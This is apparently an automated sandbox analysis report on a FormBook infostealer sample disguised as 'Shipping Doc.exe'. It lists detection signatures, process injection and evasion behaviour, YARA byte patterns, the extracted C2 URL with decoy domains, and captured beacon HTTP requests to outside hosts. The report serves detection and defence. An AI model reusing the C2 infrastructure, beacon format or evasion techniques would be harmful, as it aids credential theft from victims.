Play interactive tour

Edit tour

Windows Analysis Report Shipping Doc.exe

Overview

General Information

Sample Name:	Shipping Doc.exe
Analysis ID:	458885
MD5:	159d560ff64cdb2d130b1635f4123a49
SHA1:	5762036dd01f8a63ce29557c5c0464360500c7e6
SHA256:	065252f5ed5475c89d2bff7389554a4695a85900a7a75eb98170c6a372b33ea0
Tags:	exeFormbook
Infos:
Most interesting Screenshot:

Detection

FormBook

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

System process connects to network (likely due to code injection or exploit)

Yara detected FormBook

C2 URLs / IPs found in malware configuration

Machine Learning detection for sample

Maps a DLL or memory area into another process

Modifies the context of a thread in another process (thread injection)

Modifies the prolog of user mode functions (user mode inline hooks)

Queues an APC in another process (thread injection)

Sample uses process hollowing technique

Tries to detect virtualization through RDTSC time measurements

Antivirus or Machine Learning detection for unpacked file

Binary contains a suspicious time stamp

Checks if the current process is being debugged

Contains functionality for execution timing, often used to detect debuggers

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to read the PEB

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Enables debug privileges

Found inlined nop instructions (likely shell or obfuscated code)

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Yara signature match

Classification

Process Tree

System is w10x64

Shipping Doc.exe (PID: 1932 cmdline: 'C:\Users\user\Desktop\Shipping Doc.exe' MD5: 159D560FF64CDB2D130B1635F4123A49)

Shipping Doc.exe (PID: 2148 cmdline: C:\Users\user\Desktop\Shipping Doc.exe MD5: 159D560FF64CDB2D130B1635F4123A49)

explorer.exe (PID: 3388 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)

cscript.exe (PID: 2000 cmdline: C:\Windows\SysWOW64\cscript.exe MD5: 00D3041E47F99E48DD5FFFEDF60F6304)

cmd.exe (PID: 3984 cmdline: /c del 'C:\Users\user\Desktop\Shipping Doc.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)

conhost.exe (PID: 6040 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.shopjempress.com/amb6/"], "decoy": ["segurocars.com", "rylautosales.com", "xinglinjiankang.com", "dantil-brand.com", "sofaloffa.club", "coinclub2.com", "ez-pens.com", "gqtlqsw.com", "robotnewswire.com", "ktproductreviews.com", "merchbrander.com", "yesonamendmentb.com", "losgatoslimos.com", "kristincole.art", "metalmaids.online", "leftcoastmodels.com", "athetheist.com", "jblbusrtingsale.com", "chungcugiarehcm.com", "renblockchain.com", "bigdaddy.fish", "comproliverton.pro", "gzmove.com", "honeythymeherbfarm.com", "davinescosmetics.com", "9355693.com", "movinmemphis901.com", "patriotsrs.net", "dagelijkseschoenen.com", "a-want-ad.site", "theodbox.com", "audioky.net", "hopematthewsrealtor.com", "theonlinemoneymachine.com", "misakiti.com", "ad-yalong.com", "mikealazo.com", "marianoterra.com", "shivorja.com", "goodvibrationswindchimes.com", "pecom-deliverry.online", "amlexcel.com", "emeralddrumcompany.com", "dalipaella.com", "shopcamacci.com", "xucaiwujin.com", "bxs5000.com", "2en1institut.com", "zxzm47-wj.com", "builttek.com", "66400yy.com", "beegraze.com", "thedottedcat.com", "komsah.com", "4202nsacramentoav.info", "88q27.com", "toriengenharia.com", "briscoewelding.com", "brookelenzi.com", "tribaltrash.com", "bidtas.com", "shokhorror.com", "bodurm.com", "333.wiki"]}

Yara Overview

Memory Dumps

Source	Rule	Description	Author	Strings
0000000F.00000002.480234994.0000000005230000.00000004.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
0000000F.00000002.480234994.0000000005230000.00000004.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b327:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c32a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
0000000F.00000002.480234994.0000000005230000.00000004.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18409:$sqlite3step: 68 34 1C 7B E1 0x1851c:$sqlite3step: 68 34 1C 7B E1 0x18438:$sqlite3text: 68 38 2A 90 C5 0x1855d:$sqlite3text: 68 38 2A 90 C5 0x1844b:$sqlite3blob: 68 53 D8 7F 8C 0x18573:$sqlite3blob: 68 53 D8 7F 8C
00000004.00000002.320916195.0000000001C90000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000004.00000002.320916195.0000000001C90000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b327:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c32a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000004.00000002.320916195.0000000001C90000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18409:$sqlite3step: 68 34 1C 7B E1 0x1851c:$sqlite3step: 68 34 1C 7B E1 0x18438:$sqlite3text: 68 38 2A 90 C5 0x1855d:$sqlite3text: 68 38 2A 90 C5 0x1844b:$sqlite3blob: 68 53 D8 7F 8C 0x18573:$sqlite3blob: 68 53 D8 7F 8C
00000004.00000002.320396445.00000000014D0000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000004.00000002.320396445.00000000014D0000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b327:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c32a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000004.00000002.320396445.00000000014D0000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18409:$sqlite3step: 68 34 1C 7B E1 0x1851c:$sqlite3step: 68 34 1C 7B E1 0x18438:$sqlite3text: 68 38 2A 90 C5 0x1855d:$sqlite3text: 68 38 2A 90 C5 0x1844b:$sqlite3blob: 68 53 D8 7F 8C 0x18573:$sqlite3blob: 68 53 D8 7F 8C
00000004.00000002.319900347.0000000000400000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000004.00000002.319900347.0000000000400000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b327:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c32a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000004.00000002.319900347.0000000000400000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18409:$sqlite3step: 68 34 1C 7B E1 0x1851c:$sqlite3step: 68 34 1C 7B E1 0x18438:$sqlite3text: 68 38 2A 90 C5 0x1855d:$sqlite3text: 68 38 2A 90 C5 0x1844b:$sqlite3blob: 68 53 D8 7F 8C 0x18573:$sqlite3blob: 68 53 D8 7F 8C
0000000F.00000002.478585925.0000000003200000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
0000000F.00000002.478585925.0000000003200000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b327:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c32a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
0000000F.00000002.478585925.0000000003200000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18409:$sqlite3step: 68 34 1C 7B E1 0x1851c:$sqlite3step: 68 34 1C 7B E1 0x18438:$sqlite3text: 68 38 2A 90 C5 0x1855d:$sqlite3text: 68 38 2A 90 C5 0x1844b:$sqlite3blob: 68 53 D8 7F 8C 0x18573:$sqlite3blob: 68 53 D8 7F 8C
0000000F.00000002.479510604.0000000003830000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
0000000F.00000002.479510604.0000000003830000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b327:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c32a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
0000000F.00000002.479510604.0000000003830000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18409:$sqlite3step: 68 34 1C 7B E1 0x1851c:$sqlite3step: 68 34 1C 7B E1 0x18438:$sqlite3text: 68 38 2A 90 C5 0x1855d:$sqlite3text: 68 38 2A 90 C5 0x1844b:$sqlite3blob: 68 53 D8 7F 8C 0x18573:$sqlite3blob: 68 53 D8 7F 8C
Click to see the 13 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
4.2.Shipping Doc.exe.400000.0.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
4.2.Shipping Doc.exe.400000.0.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8ae8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8d62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x14885:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14371:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x14987:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x14aff:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x977a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x135ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa473:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1a527:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1b52a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
4.2.Shipping Doc.exe.400000.0.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x17609:$sqlite3step: 68 34 1C 7B E1 0x1771c:$sqlite3step: 68 34 1C 7B E1 0x17638:$sqlite3text: 68 38 2A 90 C5 0x1775d:$sqlite3text: 68 38 2A 90 C5 0x1764b:$sqlite3blob: 68 53 D8 7F 8C 0x17773:$sqlite3blob: 68 53 D8 7F 8C
4.2.Shipping Doc.exe.400000.0.raw.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
4.2.Shipping Doc.exe.400000.0.raw.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b327:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c32a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
4.2.Shipping Doc.exe.400000.0.raw.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18409:$sqlite3step: 68 34 1C 7B E1 0x1851c:$sqlite3step: 68 34 1C 7B E1 0x18438:$sqlite3text: 68 38 2A 90 C5 0x1855d:$sqlite3text: 68 38 2A 90 C5 0x1844b:$sqlite3blob: 68 53 D8 7F 8C 0x18573:$sqlite3blob: 68 53 D8 7F 8C
Click to see the 1 entries

Sigma Overview

No Sigma rule has matched

Jbx Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Found malware configuration

Show sources

Source: 0000000F.00000002.480234994.0000000005230000.00000004.00000001.sdmp

Malware Configuration Extractor: FormBook {"C2 list": ["www.shopjempress.com/amb6/"], "decoy": ["segurocars.com", "rylautosales.com", "xinglinjiankang.com", "dantil-brand.com", "sofaloffa.club", "coinclub2.com", "ez-pens.com", "gqtlqsw.com", "robotnewswire.com", "ktproductreviews.com", "merchbrander.com", "yesonamendmentb.com", "losgatoslimos.com", "kristincole.art", "metalmaids.online", "leftcoastmodels.com", "athetheist.com", "jblbusrtingsale.com", "chungcugiarehcm.com", "renblockchain.com", "bigdaddy.fish", "comproliverton.pro", "gzmove.com", "honeythymeherbfarm.com", "davinescosmetics.com", "9355693.com", "movinmemphis901.com", "patriotsrs.net", "dagelijkseschoenen.com", "a-want-ad.site", "theodbox.com", "audioky.net", "hopematthewsrealtor.com", "theonlinemoneymachine.com", "misakiti.com", "ad-yalong.com", "mikealazo.com", "marianoterra.com", "shivorja.com", "goodvibrationswindchimes.com", "pecom-deliverry.online", "amlexcel.com", "emeralddrumcompany.com", "dalipaella.com", "shopcamacci.com", "xucaiwujin.com", "bxs5000.com", "2en1institut.com", "zxzm47-wj.com", "builttek.com", "66400yy.com", "beegraze.com", "thedottedcat.com", "komsah.com", "4202nsacramentoav.info", "88q27.com", "toriengenharia.com", "briscoewelding.com", "brookelenzi.com", "tribaltrash.com", "bidtas.com", "shokhorror.com", "bodurm.com", "333.wiki"]}

Multi AV Scanner detection for submitted file

Show sources

Source: Shipping Doc.exe	Virustotal: Detection: 50%	Perma Link
Source: Shipping Doc.exe	Metadefender: Detection: 31%	Perma Link
Source: Shipping Doc.exe	ReversingLabs: Detection: 26%

Yara detected FormBook

Show sources

Source: Yara match	File source: 4.2.Shipping Doc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.Shipping Doc.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000F.00000002.480234994.0000000005230000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.320916195.0000000001C90000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.320396445.00000000014D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.319900347.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.478585925.0000000003200000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.479510604.0000000003830000.00000040.00000001.sdmp, type: MEMORY

Machine Learning detection for sample

Show sources

Source: Shipping Doc.exe

Joe Sandbox ML: detected

Source: 4.2.Shipping Doc.exe.400000.0.unpack

Avira: Label: TR/Crypt.ZPACK.Gen

Source: Shipping Doc.exe

Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED

Source: Shipping Doc.exe

Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

Source:	Binary string: cscript.pdbUGP source: Shipping Doc.exe, 00000004.00000002.321211799.0000000003630000.00000040.00000001.sdmp
Source:	Binary string: wscui.pdbUGP source: explorer.exe, 00000006.00000000.292742080.000000000EBC0000.00000002.00000001.sdmp
Source:	Binary string: wntdll.pdbUGP source: Shipping Doc.exe, 00000004.00000002.320512631.0000000001960000.00000040.00000001.sdmp, cscript.exe, 0000000F.00000002.480637752.000000000548F000.00000040.00000001.sdmp
Source:	Binary string: wntdll.pdb source: Shipping Doc.exe, 00000004.00000002.320512631.0000000001960000.00000040.00000001.sdmp, cscript.exe
Source:	Binary string: cscript.pdb source: Shipping Doc.exe, 00000004.00000002.321211799.0000000003630000.00000040.00000001.sdmp
Source:	Binary string: wscui.pdb source: explorer.exe, 00000006.00000000.292742080.000000000EBC0000.00000002.00000001.sdmp

Source: C:\Users\user\Desktop\Shipping Doc.exe	Code function: 4x nop then pop esi	4_2_00417164
Source: C:\Users\user\Desktop\Shipping Doc.exe	Code function: 4x nop then pop ebx	4_2_00407AFB
Source: C:\Users\user\Desktop\Shipping Doc.exe	Code function: 4x nop then pop edi	4_2_00416C9C
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 4x nop then pop ebx	15_2_03207AFB
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 4x nop then pop esi	15_2_03217164
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 4x nop then pop edi	15_2_03216C9C

Networking:

C2 URLs / IPs found in malware configuration

Show sources

Source: Malware configuration extractor

URLs: www.shopjempress.com/amb6/

Source: global traffic	HTTP traffic detected: GET /amb6/?DPt4=by49o9P4nbuTuOEn2y8q30QOI4mC2WgRQPsTiLFqW4T5eczeXRV1KBHGOAlC+0HR5lXX&l8B=RjAhR HTTP/1.1Host: www.bigdaddy.fishConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /amb6/?DPt4=ZduBhxyNf/T8KdukIHnfIOdlFHQuF1EsUtpfZKs5gLBpa2z0TfcmffP3A+e7CMLv2uy0&l8B=RjAhR HTTP/1.1Host: www.davinescosmetics.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

Source: Joe Sandbox View

ASN Name: DREAMHOST-ASUS DREAMHOST-ASUS

Source: global traffic	HTTP traffic detected: GET /amb6/?DPt4=by49o9P4nbuTuOEn2y8q30QOI4mC2WgRQPsTiLFqW4T5eczeXRV1KBHGOAlC+0HR5lXX&l8B=RjAhR HTTP/1.1Host: www.bigdaddy.fishConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /amb6/?DPt4=ZduBhxyNf/T8KdukIHnfIOdlFHQuF1EsUtpfZKs5gLBpa2z0TfcmffP3A+e7CMLv2uy0&l8B=RjAhR HTTP/1.1Host: www.davinescosmetics.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

Source: unknown

DNS traffic detected: queries for: www.bigdaddy.fish

Source: cscript.exe, 0000000F.00000002.483172630.0000000005E2F000.00000004.00000001.sdmp	String found in binary or memory: http://BigDaddyUnlimited.com/amb6/?DPt4=by49o9P4nbuTuOEn2y8q30QOI4mC2WgRQPsTiLFqW4T5eczeXRV1KBHGOAlC
Source: explorer.exe, 00000006.00000000.282041503.00000000089C0000.00000004.00000001.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: explorer.exe, 00000006.00000000.282249267.0000000008B40000.00000002.00000001.sdmp	String found in binary or memory: http://fontfabrik.com
Source: explorer.exe, 00000006.00000000.282249267.0000000008B40000.00000002.00000001.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: Shipping Doc.exe, 00000002.00000003.218505402.00000000057C6000.00000004.00000001.sdmp, Shipping Doc.exe, 00000002.00000003.218511303.0000000005785000.00000004.00000001.sdmp	String found in binary or memory: http://www.ascendercorp.com/typedesigners.html
Source: explorer.exe, 00000006.00000000.282249267.0000000008B40000.00000002.00000001.sdmp	String found in binary or memory: http://www.carterandcone.coml
Source: Shipping Doc.exe, 00000002.00000003.220043454.0000000005785000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.282249267.0000000008B40000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com
Source: explorer.exe, 00000006.00000000.282249267.0000000008B40000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers
Source: Shipping Doc.exe, 00000002.00000003.219138017.00000000057BE000.00000004.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/
Source: explorer.exe, 00000006.00000000.282249267.0000000008B40000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/?
Source: explorer.exe, 00000006.00000000.282249267.0000000008B40000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: Shipping Doc.exe, 00000002.00000003.219469628.0000000005799000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.282249267.0000000008B40000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
Source: explorer.exe, 00000006.00000000.282249267.0000000008B40000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers8
Source: explorer.exe, 00000006.00000000.282249267.0000000008B40000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers?
Source: explorer.exe, 00000006.00000000.282249267.0000000008B40000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designersG
Source: Shipping Doc.exe, 00000002.00000003.220043454.0000000005785000.00000004.00000001.sdmp	String found in binary or memory: http://www.fontbureau.comalsdn
Source: Shipping Doc.exe, 00000002.00000003.220043454.0000000005785000.00000004.00000001.sdmp	String found in binary or memory: http://www.fontbureau.comcomFU
Source: Shipping Doc.exe, 00000002.00000003.220043454.0000000005785000.00000004.00000001.sdmp	String found in binary or memory: http://www.fontbureau.comd
Source: Shipping Doc.exe, 00000002.00000003.220043454.0000000005785000.00000004.00000001.sdmp	String found in binary or memory: http://www.fontbureau.comlicd
Source: explorer.exe, 00000006.00000000.282249267.0000000008B40000.00000002.00000001.sdmp	String found in binary or memory: http://www.fonts.com
Source: Shipping Doc.exe, 00000002.00000003.213525769.000000000579B000.00000004.00000001.sdmp	String found in binary or memory: http://www.fonts.comicV
Source: Shipping Doc.exe, 00000002.00000003.213474844.000000000579B000.00000004.00000001.sdmp	String found in binary or memory: http://www.fonts.comny
Source: Shipping Doc.exe, 00000002.00000003.216206775.0000000005787000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.282249267.0000000008B40000.00000002.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn
Source: Shipping Doc.exe, 00000002.00000003.216929499.0000000005786000.00000004.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn&
Source: Shipping Doc.exe, 00000002.00000003.216788502.0000000005786000.00000004.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/
Source: explorer.exe, 00000006.00000000.282249267.0000000008B40000.00000002.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: explorer.exe, 00000006.00000000.282249267.0000000008B40000.00000002.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: Shipping Doc.exe, 00000002.00000003.216206775.0000000005787000.00000004.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn4
Source: Shipping Doc.exe, 00000002.00000003.216206775.0000000005787000.00000004.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn8
Source: Shipping Doc.exe, 00000002.00000003.216929499.0000000005786000.00000004.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cnP
Source: Shipping Doc.exe, 00000002.00000003.215912066.000000000578E000.00000004.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cnd
Source: Shipping Doc.exe, 00000002.00000003.215964486.0000000000E0D000.00000004.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cny
Source: Shipping Doc.exe, 00000002.00000003.215964486.0000000000E0D000.00000004.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cnz
Source: explorer.exe, 00000006.00000000.282249267.0000000008B40000.00000002.00000001.sdmp	String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: Shipping Doc.exe, 00000002.00000003.222324750.0000000005792000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.282249267.0000000008B40000.00000002.00000001.sdmp	String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: explorer.exe, 00000006.00000000.282249267.0000000008B40000.00000002.00000001.sdmp	String found in binary or memory: http://www.goodfont.co.kr
Source: Shipping Doc.exe, 00000002.00000003.218276730.0000000005785000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.282249267.0000000008B40000.00000002.00000001.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: Shipping Doc.exe, 00000002.00000003.218276730.0000000005785000.00000004.00000001.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/0
Source: Shipping Doc.exe, 00000002.00000003.218276730.0000000005785000.00000004.00000001.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/8
Source: Shipping Doc.exe, 00000002.00000003.218276730.0000000005785000.00000004.00000001.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/;
Source: Shipping Doc.exe, 00000002.00000003.218276730.0000000005785000.00000004.00000001.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/B
Source: Shipping Doc.exe, 00000002.00000003.218276730.0000000005785000.00000004.00000001.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/U
Source: Shipping Doc.exe, 00000002.00000003.218276730.0000000005785000.00000004.00000001.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/Y0/
Source: Shipping Doc.exe, 00000002.00000003.218276730.0000000005785000.00000004.00000001.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/Y0a
